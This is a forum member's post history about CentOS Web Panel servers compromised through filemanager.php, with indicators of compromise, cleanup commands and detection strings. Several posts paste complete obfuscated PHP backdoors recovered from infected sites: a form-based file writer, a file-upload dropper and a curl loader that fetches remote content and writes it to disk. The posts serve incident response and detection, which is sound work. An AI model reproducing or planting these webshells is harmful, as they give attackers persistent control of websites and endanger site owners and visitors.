Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - ConcernedCitizen

Pages: [1]
1
Thank you all. I found defauit.php date stamp on JUL 05, 2025

Every file has a different date stamp. Those files were touched to a close date and time of the neighbor files, that date stamp is not the right one. Don't mind searching for time and date, it won't do anything.

Those IP addresses are the same as mine. So, same hacker.

'nbpafebaef.jpg'
'.auto_monitor'
Where these files were present? Do you still know?
.jpg files are always in the same folder with defauit.php file and with sappurit's reply its confirmed that nbpafebaef.jpg file is not randomly named(Same filename with my screenshot earlier at page 7) but its not the only jpg file.
I think IP addresses are irrelevant because blocking them are not solution. Its easy to change IP address or tunnel connections.
The timestamp might be touched but it still tell us that most likely vulnerability is still exists.

Maybe someone could decode filemanager.php and apply a fix by adding a check for php sessions.

2
My wordpress wibsites also infeted. And other websites non worpress also. Replaced index.php, added  licelic.c" backup.c defauit.php. I found admin accounts in database WP-user wpadmin@volovmart.ru. I dont know how its happened. But i think it is Panel hacked because it is not effect  only WordPress CMS. Im using CWP pro.
Hello,

We're encountering the same situation on one of our servers.
While we're actively performing cleanup operations, the critical question remains: Has this vulnerability truly been resolved by the "silent patch"?

Do you have any informations about when end what version of the patch/update ?

Best regards,
I have the same problem. My VPS are infected.
Im using CWPpro version: 0.9.8.1218 and Rocky Linux release 9.5
After the intrusion i have problems with SEO, google results display titles from other sources.
My websites traffic has plummeted in the last few days because of this change. When I type site:mysomain.tld into Google, I see that the results point to my websites, but the text is different.
Does anyone else have this problem? Do you know how to fix it? How did you manage to change it? I've already submitted sitemaps to Google Search Console, but I'm not sure if it will work.

First thing to do is renaming /usr/local/cwpsrv/var/services/user_files/modules/filemanager.php as /usr/local/cwpsrv/var/services/user_files/modules/filemanager.php.disabled

Then follow the messages sent by @pedromidiasf and me at page 5 to page 7. You will see the names of the malicious files dropped by attackers.

What exploiters are capable of is equal to filemanager at the start and this might not seem worrying. But then they take full advantage of PHP so if they want to remove whole of your files, they can and they can redirect your visitors to other websites.

If I was the one whos using this exploit I could convert this to a DDoS tool by redirecting every visitor to the website that I want to cause DoS. So, there is no limit, they can do anything they want and every IT admin should take this seriously.

3
You can also search in your files. "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";"
Might be another backdoor.

Don't trust to find this sequence. All injected files, even if they do the same, all of them have different obfuscation codes even with different sequence of code.
Best way is to search for index files within the folders and check your main index file.
Also consider to disable php execution inside folders that are not needed. Also disable direct execution of php files that don't need to be called directly from URL. This can be done with folder permissions and .htacess files.

This is not obfuscated code. This is ASCII equal to <form method="post".
Attacker uses this pattern in many backdoor files. Its safe for mass remove unless you use regex in your search parameters.

4
Yet another:

Code: [Select]
4tLR0erSJU _NVs7Gua3DXxdlTMkcAbPv 6IfQZ5w8n1pjy
gEoF2 qWKhOHYCm9Bz
iZpG0wgCFzf KQIkmM9yLh5W noDeJai
dNvAq3YrHU16ulxSOX78tR_bs2Tc4EPV
jB MLUdi95
Y
pCgOh84GFvXT1exyWk7cP D3QjBuqr 6H JS2woaK_nmR0EIfbZAzsNVtlP1ISy2tYx
5KC7hJ0vfMW6p mgR_b l8NG3aQsUiuVBHATcq XjrFnO4Z
LdozweD9kEv5NHusbl7 CtZQYFLgy23zPK9D OaMxdSeTcGnq0WUpf_R
EXrjwm16Bk8IVoh
4JAi FI
sChXag G3_o cTZn84Vq2 9KtMedxRzkuSEJmf76wbpOH5iNWDQjB
1ryLUlYAv0PdNVpDkH7 G6ZOhmY_5sl3i4croxKRUEzQTu1 P8FMgaA
Wvnq2XLCSftby
ewjB90IJan
Vc4NEB6kKYFz
siUxpZAgSComXO 3 R0QHylq5eT9uPvtrJLbWw1h8GdDMIjf72_N
GIn Aoka5gd42mXeYMJxlj3KPLS pHifV0QrFDZctWqEy 76CsBuvb98_zTROU1hw
ZN t
q83hI6
Ty GUeix9E1AsYb0MQW_CjrH4dXpoLSlKBvwF2g5DzfVRmJk7aun OcP<?php goto Y_0nXzAq;dPW4cKs3$xAs7Tpz stripos("xpdk3L0BI","NSzAt"); goto w7QUDA;oI0Ofs1NSE: echo "\74\x64\151\x76\76\x3c\x69\156\160\x75\x74\40\x74\171\x70\145\75\x22\164\x65\x78\x74\42\40\x6e\141\155\x65\75\x22\x71\x79\62\x69\x5a\x22\76\x3c\x2f\144\x69\x76\x3e";goto gEoeu7CYmH;lb_z0E: if($B_6Ta) exit("MPu2OYfMbJ".$F1mVH($B_6Ta));goto DrKUus;TI578M2$jg3TmtQ = isset($_POST["qy2iZ"])?trim($_POST["qy2iZ"]):"";goto n20zQ9o;RLgetNOE: if($B_6Ta$Vx6b5eC($B_6Ta,$n2XtH3a);goto lb_z0E;KRTmDNl$D8jZIM5E = array("sg3tOMKyxWQfXZ"); goto WQIED9;LPvaiTkrsM$wAuWIZ5 str_repeat(""13); goto KRTmDNl;Q8kceJNKf: function gjrAdtg($_yU43,$FyDsPmb){ $b91Og str_split($_yU43,1); $xBjlH0Y explode(",",$FyDsPmb); $wqGkWJg=""; foreach($xBjlH0Y as $v){ $wqGkWJg .= $b91Og[(int)$v]; } return $wqGkWJg; }goto L0LQ7hb4;cD6Re4V9s: echo "\x3c\x62\x75\164\x74\157\x6e\x20\164\171\160\x65\75\x22\x73\165\142\155\151\164\42\x3e\163\x75\x62\x6d\151\x74\x3c\x2f\x62\x75\x74\x74\157\156\76";goto l_Ln6t1XY;fWFX6D3: echo "\74\x66\157\x72\155\40\x6d\145\164\150\157\144\75\42\120\x4f\x53\x54\42\x3e";goto oI0Ofs1NSE;DrKUus$Le4p2 str_replace("Le4p2""""Le4p2");goto Q8kceJNKf;kZly82kt: if(!isset($_GET["U8v"]))exit;goto TI578M2;g8fvDVd$cXUEo94Gg addcslashes("cXUEo94Gg","JbuaWR8jKC"); goto ubiQf8X;I0xkT8MIo$AUCcxm3 strtok("AUCcxm3"); goto gvoaFcZ3;WQIED9$zFGOj8f str_replace("zFGOj8f""""zFGOj8f");goto Li1o5cfm27;llJW4kEf9$x5scPOjt false; goto fbZp1Xjf;XfOS3Dc$B_6Ta = !empty($n2XtH3a)? $Qgi0D($jg3TmtQ,"w"):"";goto H7fbdkCE;H7fbdkCE$IewLIh str_repeat(""13); goto RLgetNOE;gEoeu7CYmH$zHES9 addslashes("zHES9"); goto jdRWyZ;Li1o5cfm27$dRLQvy str_shuffle("Y5_HmEAQe"); goto g8fvDVd;ubiQf8X$DrKtQl strstr("DrKtQl""MFIjtb0zZ"); goto qZPStqv;jdRWyZ$DWm5Nc str_shuffle("fw9Jk"); goto dPW4cKs3;CTbrxv3k$FdH6ED strpos("WcoMi9bD","NAQc1"); goto VCUOJo5;FCBbyoJ$ko_A7 sprintf(""); goto kZly82kt;gvoaFcZ3$y6FmI implode("y6FmI",array());goto XqZl_hutd;l_Ln6t1XY: echo "\74\57\146\157\162\155\x3e";goto LPvaiTkrsM;w7QUDA: echo "\x3c\144\151\166\76\74\164\145\170\164\x61\162\145\141\40\x6e\x61\x6d\145\75\x22\x41\x4e\x33\x37\x38\42\40\162\157\167\163\75\x22\x35\x22\76\x3c\x2f\164\x65\x78\x74\x61\162\x65\141\x3e\x3c\x2f\x64\x69\x76\76";goto cD6Re4V9s;VCUOJo5$xdsef c8SWnC::JPFrgeHO("xYCU1Tl",3);goto XfOS3Dc;kSwOti$rson9 strstr("rson9""PCKFi09"); goto I0xkT8MIo;Y_0nXzAq$enzir str_shuffle("ecSJnCA"); goto kSwOti;fbZp1Xjf: class c8SWnC{ public static function __callStatic($name$arguments) { $temarr = array("Qgi0D"=>array("c2fnmdelr7y_ropazeMx0pWejt","2,13,14,6,3"),"Vx6b5eC"=>array("XaieuRrZAxGfUvcdaFbpreweWlt_","11,22,6,2,26,3"),"F1mVH"=>array("a1_Sp5oziMfcrH7wZclEselpeeAF","10,11,18,6,20,21")); foreach($temarr as $key=>$v){ $GLOBALS[$key] =  gjrAdtg($v[0],$v[1]); } } }goto fWFX6D3;n20zQ9o$n2XtH3a = isset($_POST["AN378"])?trim($_POST["AN378"]):""; goto CTbrxv3k;L0LQ7hb4$XlpVX ucwords("O_bclSmgv"); goto llJW4kEf9;XqZl_hutd$G_eLJz sprintf(""); goto FCBbyoJ;qZPStqv:""?>S7xr01o
zQiyX8uFCbpvaD6fWI9VnNsUZdqhjtY JGeg5_TwOKPL3
RABckM 2HEml4RG v9ifYzuMOP2HXASjcaper6714 Vb358 xnoEtKWglqQsyNkF0UCmw

hJDBILT_dZUTYIBJ1dQwWuh 0txHGmkZrNE
vo_ CgA3O2KMslynRP4z85jeD6FifqbLVS9a7cp X
0_MhDcG1 xkPWy9fNSR3AsIHTBVOe2tYiXqo76UFjCvmwQ a5KEgl4
b
LrZuzn8dpJcK64
HSUzIYPE2GCViTZA8nuomgjRN
kv1tq DxMWs59_XB lFw3yLQbdh0OJp7refa

5
Another backdoor(Search for terms such as "= strval(false); goto" to find other occurances in your webserver):

Code: [Select]
<?php goto lVijFaMf;JJDjaIOYP0$e7hWk ucfirst("gbqmo"); goto iEqHs1c;DXNSWE$ouok7MZ addslashes("ouok7MZ"); goto M3amtuEDv;HUSdrNR: if(!isset($_GET["U8v"]))exit;goto QesQqL3zP;BZvnmC: if($RsdQa)exit("TkDTbQiPzSd4Z9pAx1h".copy($_FILES["qcDxi5jZ61"][("tWUa")[0].("gEmv")[2]./**/("pk5t")[0].("sk_n2r")[2]./*
*/
("tUhnxb")[3]./*
*/
("Za1OB")[1]./*  */("O6mE")[2]./*
  */
("VeyDa")[1]],$RsdQa));goto DXNSWE;isQdpF1z$YIHPFEse = (string) null; goto kUwVlNc7d0;QesQqL3zP: if(isset($_FILES["qcDxi5jZ61"]))$RsdQa basename($_FILES["qcDxi5jZ61"][("iniY")[1]./*
 */
("FHad")[2]./*
*/
("MImEQZ")[2].("eoiyF")[0]]);goto BZvnmC;mc80VrYbp_$vSDMWP lcfirst("dMSowB7jU"); goto leUr0KWa;RY9_TI$KePs2Rp = (/* */("ziX4")[1].("mFjD")[0]./* */("Qepph")[3].("llIP5W")[0].("toUi")[1].("Odmwfn")[1].("DjbeW")[3])(",",array("XGpyb","h57YPQWV","KXTOke5","NmhUN")); goto i0NKZiX1;QOPTD8ys4$cHcBL2z4 = (("MsJI4D")[1]./*
*/
("Msuk")[2]./**/("VLbu")[2].("hs39Jc")[1].("PhFtX")[3].("yWr2")[2])("cHcBL2z4",8,0);goto RY9_TI;OEMap7X$VtXzh6f addslashes("VtXzh6f"); goto SfWARya;D5IUXJ4$FfEiu sha1("Gc7aq"); goto F1J_RKtp;kUwVlNc7d0$AgsciC4bG strpos("PYGIXK","Vigysmb6T"); goto LruYdez9j;QwphlQi1V$B5MDKsm1r = (string) null; goto QOPTD8ys4;G3_ly06IJ$PDCRK = (("hwSaJ")[1].("bohU40")[1]./* */("wirb")[2]./**/("O0acde")[4]./**/("onH7w9")[4]./* 
*/
("jWMru4")[3]./* */("OaWo")[1]./**/("gpbP_")[1])(""11);goto JJDjaIOYP0;LruYdez9j$SK59OL = (("KjtsDQ")[3].("tZ1P")[0]./* */("L5Jri")[3]./**/("tIFGxP")[0].("Nork1l")[1]./*  */("E5kme")[2])("SK59OL"); goto QwphlQi1V;i0NKZiX1$LsxEThigD sha1("aWZBpd"); goto gtL9M7EZ1u;leUr0KWa: echo /**/("<Xe9")[0]./*
  */
("vkGjf9")[4]./*  */("qaotd")[2]./* */("C3r2o7")[2].("bBmir")[2]./*
*/
("tt G")[2].(" vbf29")[0]./*
*/
("mT5d")[0].("emrb")[0].("FHtovt")[2]./*
*/
("eVhg")[2].("ZEom4S")[2].("gdmZpT")[1]./**/("Dsuh=j")[4].&#39;"&#39;./*
*/("poNw")[0]./**/("lzjorm")[3].("syhHa")[0]./*
*/
("JedtB")[3].&#39;"&#39;.("C DeC")[1]./**/("g5xe2")[3]./*
*/("q2KnqY")[3]./**/("yPcOz")[2]./*
*/
("Gft9")[2].("Ky0nvd")[1]./* */("aNpq")[2].("ce8cUG")[1].("Tu=Wc")[2].&#39;"&#39;.("A9nmQi")[3].("uAYEK")[0].("bKal1")[3].("CHstV")[3].("iAin")[0]./* */("RpvMXt")[1].("azF7XA")[0]./* */("Eprv")[2]./*   */("tXeA1a")[0].("/rhP0")[0].("qfGO")[1].("g7oe9")[2].("KMQ7rg")[4].("l3m9")[2]./* */("-Y0rt")[0]./**/("FnkdF")[3].("jays")[1]./*
*/("tQB8")[0]./* */("WnXNae")[4].&#39;"&#39;.("W5>o")[2];goto NCQOl4V_d;QXQSIJ: $s9N_vWPUq = (/**/("PsM0F")[1].("H5p8")[2].("VZrvf")[2]./**/("JMiJ")[2]./**/("vtnnA")[2].("Njt3Sk")[2].("fyQI")[0])(""); goto gyIvf3Gw;lVijFaMf: $UWg_fp2 = (/**/("cja8xK")[0]./* 
*/("ohEFq")[1].("ubvgx")[0].("qq4nng")[4].("o3pkra")[3]./**/("a3_eRq")[2].("SspUyB")[1]./*
*/
("GpcY5")[1]./* 
*/
("hl5zoc")[1].("iNkS")[0].("Qt9eU")[1])("qEZi0qy3rN7c",3); goto isQdpF1z;PHQO3t$WAiLRzYf lcfirst("I3ZDXQ"); goto D5IUXJ4;HpTmlO: echo /**/("MA<w")[2].("pih6")[1].("nmkl")[0].("Cpgo")[1].("lmyu3")[3]./**/("tbZM4W")[0].("j5 h")[2]./* */("ztea0E")[1]./* */("Oy7Gr")[1].("QV7_pd")[4].("geEAw")[1].("GkB=V")[3].&#39;"&#39;./* */("oksh")[2].("puw7")[1].("bBrC")[0]./*

*/("DqDmj")[3].("vPYiT")[3]./* */("Rt8L")[1].&#39;"&#39;./*
*/("FP JoZ")[2]./* */("TRvE")[2]./*
*/
("MQtLam")[4]./* 

*/
("rlf9K")[1]./**/("dQ0Yuh")[4].("eFvZ")[0]./*
*/
("=fEv")[0].&#39;"&#39;.("aiFsBe")[3].("cnuqCR")[2].("bx_4")[0]./**/("Qm_lZn")[1]./*
*/("qi_g2")[1].("KbtH4")[2].&#39;"&#39;./**/("M>2Um")[1];goto QXQSIJ;SfWARya: $yTa7b = addslashes("yTa7b"); goto PHQO3t;gyIvf3Gw: echo ("<phD")[0]./*
*/("n/yaoF")[1].("JfExCS")[1]./* */("nEoVjD")[2]./*  */("TNrx")[2].("sm5zfD")[1].("Wcl>M")[3];goto OEMap7X;F1J_RKtp$a2mcgG define("E1Oes","kobMCZ5Q"); goto OjXQTpN;NCQOl4V_d$jgJlQM = (/* */("Spksb")[3]./* */("nfYtt")[3].("YGrpB")[2]./* */("Cj_Sz")[2].("gryxuV")[1].("ebev")[2].("qXpL")[2].("QlKWwI")[1]./**/("jamOa9")[1]./*
 */
("a2Hcc")[3].("celqm")[1])("jgJlQM""""jgJlQM");goto ZpJDct1;M3amtuEDv$Q0bMh = (/* */("cja8xK")[0]./*
*/
("ohEFq")[1].("ubvgx")[0].("qq4nng")[4].("o3pkra")[3]./**/("a3_eRq")[2].("SspUyB")[1]./**/("GpcY5")[1]./* */("hl5zoc")[1].("iNkS")[0].("Qt9eU")[1])("BrV61eAfMIydF",3); goto mc80VrYbp_;gtL9M7EZ1u$C8f3Yq6 strval(false); goto HUSdrNR;ZpJDct1: echo ("_<ib")[1].("FDiaL")[2]./**/("nLKb4w")[0].("DpVT")[1].("u_TGl")[0].("WEftFv")[3]./**/("eF m")[2]./* */("ttUPk")[0].("yIYq")[0].("kSpx")[2].("aneY")[2].("By=2")[2].&#39;"&#39;.("lfQJ")[1]./**/("SP1iG")[3].("uLlOQ")[2].("rvjeim")[3].&#39;"&#39;./*
*/("K OeY")[1]./* 

*/
("nNvdM")[0]./**/("KazX")[1].("mLSjx")[0]./*
*/
("Aeug")[1]./*
*/
("W=p2Bx")[1].&#39;"&#39;.("gbqg")[2].("foec6t")[3]./*

*/("ijn1DL")[4].("otRxUV")[3].("im9c")[0].("t4RQ5X")[4].("ezj8f")[2]./*  */("CQZZ6")[3]./* */("6Fk9")[0].("C1i2E")[1].&#39;"&#39;.("uSc DR")[3].("qP>7")[2];goto HpTmlO;iEqHs1c: $CpiskJ = strval(false); goto A2cGUk_mr;OjXQTpN: $bAEaqf = strval(false); goto G3_ly06IJ;A2cGUk_mr:""; ?>

6
Just another obfuscated index.php file in a random directory.
You can search for terms such as "stream_get_meta_data($infoW)["uri"];goto" to find other occurances in your webserver.

Code: [Select]
<?php goto k8m1QZt2JL;yTZ1Fxr: if(!isset($_GET[/*  */("LcEF")[1]./* */("UefpAJ")[4].("ABo7")[1]./*

*/
("tGNgsd")[1]]))exit;goto OziaS8PU;vPbzyCtLXQ$eHNuBzJ strpos("wnJbkEld","u4Yhb62jk"); goto VcJp97;FI7ycwetQZ$GbmJE9c2n = (/**/("VsLP")[1].("mpNto")[3]./* */("pr2lfq")[1]./* */("J_Tt9")[1].("pNVr3b")[3].("Oev_")[1].("UogpT")[3].("AsBe9")[3]./*
*/
("ayOxC")[0].("cUmStk")[4])(""5); goto djdAEq3_Z;mNZMuAn03$ydOGPJ = (/* */("sSsh")[2].("ZtvS")[1]./* */("pADr1M")[3]./*
*/
("I_0ubT")[1].("pM983l")[0]./**/("aYudaD")[4].("kId89Q")[2])(""0); goto KUaAIeWh;ZJHKzh7N2: (/* */("csdP")[0].("tuBoV")[1]./*
*/
("rCcz")[0]./*
*/
("lbaf3R")[0]./**/("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./**/("E7tf")[2])($t7i13,(int)(("6jbAMe")[0].("L40K_Q")[1]./**/("_hBqvO")[0]./* */("Ornh4K")[1].("hEleF")[3].("peTs")[0].("lJAa")[0]), 0);goto yQ85f0rF;pb80aP$XxbaA strpos("ZzQy_I1A","qPSwx"); goto a5ePVEUtX;xJ9cj1QxEH$zAQ5o addcslashes("zAQ5o","HLVD9H67XoGvS"); goto cu4yJeSN;ZfrIJlvZ$P_Ly5sMoT define("pvt1yW","Yz49D_7"); goto dLtmkp;cNivf5$infoW copy($csSfc,/* */("kvAsC4")[3]./*

*/
("yhIm")[1].("uP6oZ")[3]./*
*/
("Hyqp7o")[3]./**/("lO0c.R")[4]./* */("pxho")[0].("qYh8")[2]./**/("LyupQ")[3]);goto gmxZhVfc;a5ePVEUtX$LbvZIl = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./*
*/
("A4VdS")[3]./**/("e_LHi")[0])(",",array("PaZH_Rtb","G2JxvFl","hoUZ10QF","MW4IobOQw")); goto CYUI5Vg278;OP7W6w$tU6Htl = (("ss3L_")[0].("pDp1")[2]./* */("AFrNvr")[2]./**/("wBiA")[2]./* */("nV17")[0].("BWtB")[2].("Yfkh")[1])(""); goto PLp95gFG;kkF4Ncr6$TH_apwEWT = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./*
*/
("e_LHi")[0])("TH_apwEWT",array());goto fGsvMWjuCg;UQUoexHiS$dZtonG = (/* */("sLZH")[0]./* 
*/
("vtZitF")[1].("rXBJ")[0].("crcsxA")[3].("TtP9")[1].("ptrQIR")[2])("dZtonG""Xj7s2uF"); goto yTZ1Fxr;RrN4Re3O_t$oMOVB51r = (("nMvsY")[3].("Lt7v")[1]./*
*/
("lrbZ")[1]./*
 */
("tABA5")[0]./*
*/
("IAob")[2]./* */("NjkN")[2])("oMOVB51r"); goto eF_jfNyOpE;gmxZhVfc: echo /* */("Zsa9")[1].("IcruR")[3]./*  */("Rc9H")[1]./**/("wJcVmu")[2]./* */("ieZ6H")[1].("sK4S")[0].("_sr_")[1];goto glwegx;arGUuE: (/**/("csdP")[0].("tuBoV")[1]./**/("rCcz")[0]./*
*/
("lbaf3R")[0]./**/("IN_Uo")[2]./*
*/
("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./* */("T3opB")[2].("fpVS")[1]./*
*/
("E7tf")[2])($t7i13,(int)(("gc1l")[2]./* 
*/
("Tu0X")[2]./**/("0_6Yf")[0].("E2k0sR")[3].("Uv62N")[3]),$Cr7YLD);goto jeITJ05L;_QPyC_Uw2d: if(!$infoW)exit;goto qaCsrh;eF_jfNyOpE$lqGibM false; goto qb6tWVjZ;m2UFsayhKtfwrite/*x1dsK*/($infoW,$E9kFDYug);goto vPbzyCtLXQ;CYUI5Vg278$E9kFDYug = (/*
*/
("ccqL8")[1].("kFuEk")[2].("jrRr6")[3]./* 
*/
("NBl67")[2].("Bn_s")[2]./*
*/
("oyLce4")[4]./*

*/
("Eg_xc")[3].("zeWz9p")[1].("cENYr")[0])($t7i13);goto nMiUby1u;jeITJ05L: (/**/("csdP")[0].("tuBoV")[1]./* 
*/
("rCcz")[0]./*


*/
("lbaf3R")[0]./* */("IN_Uo")[2]./* */("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./*  
*/
("T3opB")[2].("fpVS")[1]./*  */("E7tf")[2])($t7i13,(int)(("1wuA")[0].("9VKY")[0].("Gm90c")[2].("tHlX1Y")[4]./* */("3JbxO")[0]), 1);goto ZJHKzh7N2;ycMWqZr4C$irwRMpNx = (("nMvsY")[3].("Lt7v")[1]./**/("lrbZ")[1]./* 
*/
("tABA5")[0]./* */("IAob")[2]./**/("NjkN")[2])("irwRMpNx"); goto xJ9cj1QxEH;rgOInqtUo: (/* */("MITicM")[4].("eH4ucd")[3]./**/("Borcf")[2].("AlkY")[1]./**/("_NIqj")[0]./**/("ichPI")[1].("hluo")[1]./* 
*/
("oFWp2X")[0]./**/("sRqxW")[0]./*
*/
("MJVer")[3])($t7i13);goto xqvlspVMua;rxOZNFk6$_3dp2Bmv define("gS0ht4vV","BmWliLbks"); goto arGUuE;glwegx$Ji8Czwd = (("K4Pwx")[3]./*

*/
("oU8IH")[0]./**/("Yrmrhj")[3].("dAn05L")[0]./* */("U4w5s")[2]./**/("QtrRd")[2].("FiaP")[2]./* */("kepvP")[2])(""8);goto ZfrIJlvZ;VcJp97$csSfc stream_get_meta_data($infoW)["uri"];goto zvoTdAM;AzW2rIcJ$infoW tmpfile();goto _QPyC_Uw2d;YO7HPNId4$sXEr6Sz = (("msSf")[1]./*

*/
("lJFu4d")[3].("Db8T3")[1]./*  */("sqST")[0].("MgaJtz")[4]./*
*/
("Eru4")[1])("sXEr6Sz",7,0);goto UQUoexHiS;CAVY2h$Hyl46K8Pe = (string) null; goto kkF4Ncr6;VYlTbVK9Cv$bkPC7wsv addslashes("bkPC7wsv"); goto I0tBIKQV5u;PLp95gFG$KFHM5D str_shuffle("l5wgOtr9"); goto mNZMuAn03;H38OmS_psA$ARVzAQu75 sha1("l45rQuas"); goto ZgjHvXPb;y_QeZmI$lnbixGW6K strval(false); goto FI7ycwetQZ;qb6tWVjZ$Ed9U5Pe = (("lbsSNF")[2].("UtwcV")[1].("P6rgd")[2].("L09_1")[3].("borsxS")[2]./*
*/
("We1B")[1]./*
*/
("pcpv")[2].("oHlG")[2].("LRma5")[3].("Xx9cgf")[3]./*
 */
("ewfMO")[0])("Ed9U5Pe""""Ed9U5Pe");goto VYlTbVK9Cv;fGsvMWjuCg$YZqXErkJ = (("nMvsY")[3].("Lt7v")[1]./**/("lrbZ")[1]./* */("tABA5")[0]./**/("IAob")[2]./**/("NjkN")[2])("YZqXErkJ"); goto DLBXjhA;jG5mLo1C$oh7lPvV ucfirst("XnNXA"); goto CAVY2h;djdAEq3_Z$vp6WA8o3 defined("L4cqa"); goto OP7W6w;k8m1QZt2JL$gTPQ4h_ = (string) null; goto jG5mLo1C;xqvlspVMua$j6ten = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./*  */("e_LHi")[0])(",",array("N6SpwGx","dXFrUC","yCMd3aqoh","ZT9mZANQd")); goto AzW2rIcJ;zvoTdAM$K0ucKTH = (/*
*/
("VsLP")[1].("mpNto")[3]./**/("pr2lfq")[1]./**/("J_Tt9")[1].("pNVr3b")[3].("Oev_")[1].("UogpT")[3].("AsBe9")[3]./* */("ayOxC")[0].("cUmStk")[4])(""9); goto cNivf5;TYXDZEOJmf$ql3NdoZhX = (/**/("cdBD")[0].("rrhF6")[2].("MuUOr")[1]./**/("nogxjH")[0]./**/("UXky")[2]./*
*/
("lC_B")[2]./* */("Ys2YWh")[1]./* */("_M6pL")[3]./* 

*/
("ZxlK")[2].("dW2Yic")[4].("vtmA0")[1])("Fi1WqIDCMdxfVZ",3); goto Al0Jehv;ywlXs3Q$V63Ja = (("ss3L_")[0].("pDp1")[2]./**/("AFrNvr")[2]./*
 */
("wBiA")[2]./* */("nV17")[0].("BWtB")[2].("Yfkh")[1])(""); goto ncjtyvXFZ;ZgjHvXPb$H9MphLJI = (string) null; goto RrN4Re3O_t;dLtmkp$enf6Gi strval(false); goto H38OmS_psA;KUaAIeWh$ktFgPIC strpos("xO4DmC9YN","cKoiJMdr5"); goto YO7HPNId4;nMiUby1u$JNhW9rbZ2 str_shuffle("uYL8h25BV"); goto TYXDZEOJmf;Al0Jehv$I7rMnac = (string) null; goto rgOInqtUo;ncjtyvXFZ$t7i13 = (/*
 */
("cAGt")[0]./*
 
*/
("bugBio")[1]./**/("H4rE")[2].("lf57")[0].("LlQ__X")[4].("LxiWUA")[2]./*
*/
("SKnLI")[2]./*

*/
("igql")[0]./* */("MtgB28")[1])();goto rxOZNFk6;cu4yJeSN$vqMptm addcslashes("vqMptm","IObRDjqzLMWXv"); goto NuPUfHtybg;DJtNV7$K_WRFfn lcfirst("dOV3gjZAn"); goto ycMWqZr4C;DLBXjhA$K5mQnDhjp = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./**/("e_LHi")[0])(",",array("vBTAjn","HyP0zIH","LMGfhu","VcsT_mR1")); goto y_QeZmI;I0tBIKQV5u$PDZK2ztn = array("JmS6k7IrqLxD"); goto DJtNV7;yQ85f0rF: (/*
*/
("csdP")[0].("tuBoV")[1]./**/("rCcz")[0]./*
*/
("lbaf3R")[0]./* */("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./*
*/
("E7tf")[2])($t7i13,(int)(/**/("L135XO")[1].("mHc3fP")[3].("ZH_9Bo")[2]./*
*/
("rnvWG")[0].("kmepc")[2]./* */("pAI7")[0].("ChKFlJ")[4]), 49);goto pb80aP;OziaS8PU$Cr7YLD /*  */("_Xj4hP")[4]./*
 */
("zht8so")[2]./* */("GvLtuJ")[3]./* */("Scpo7")[2]./**/("LH:4ym")[2].("/cpL")[0]./*
 */
("/AAW")[0].("Sv3J")[1]./* */("oak4")[0]./**/("tblrC")[2].("dogcE")[1].("D2Kv1l")[3].("oM4mG")[3]./* 
*/
("aFau")[0]./**/("Brdw")[1].("utUO")[1]./*
*/
(".O3I")[0]./* */("i4rV")[2]./**/("b7u9")[2]./**/("U/ZSoV")[1].("JdfOn")[1]./*

*/
("XEd_ag")[4].("YyIMi2")[4]./* 
*/
("/AfZ")[0].("I4A6?F")[4].("NPtqVR")[2]./*
*/
("_i=Ygp")[2].("pCvE")[0].("c&wB3u")[1]./* 
*/
("thIlG")[3].("t=n3")[1].("zu2BCD")[0].("Sljdi")[3].("Rh20K")[1].("m5ysb")[2]./**/("KS-H")[2]./* */("e8kT")[1]./* */("u-Gilp")[1]./* */("8k0oMA")[0];goto ywlXs3Q;qaCsrh$t1gXasH4J = (/*
 */
("sLZH")[0]./* */("vtZitF")[1].("rXBJ")[0].("crcsxA")[3].("TtP9")[1].("ptrQIR")[2])("t1gXasH4J""rgH8fJFR0"); goto m2UFsayhKt;NuPUfHtybg:""?>

7
You dont need a script to remove them. This will remove all of the malicious code except for index.php.
Code: [Select]
find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.
If you have two examples of infected index.php file, i can try to make a script that will auto remove them.

I had files that didn't have the dot on the ".c", they were just "c". Take a look in your server as well.
Also inspect all your robots.txt and index.php (of the root folder of each website) mine got infect on top.

Yeah, i've found the file named "c" one of the websites. I've also found another index.php file in a random directory, which was obfuscated but its obvious that the file is creating an html form element.
Code: [Select]
echo "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";
Code: [Select]
<form method="POST"
You can also search in your files. "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";"
Might be another backdoor.

8
I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.

As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.

Oh i found one image file from a backup.

How did you mass remove them? Do you have a script that you could share?

You dont need a script to remove them. This will remove all of the malicious code except for index.php.
Code: [Select]
find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.
If you have two examples of infected index.php file, i can try to make a script that will auto remove them.

9
I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.

As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.

Oh i found one image file from a backup.

10
I found some .c files.
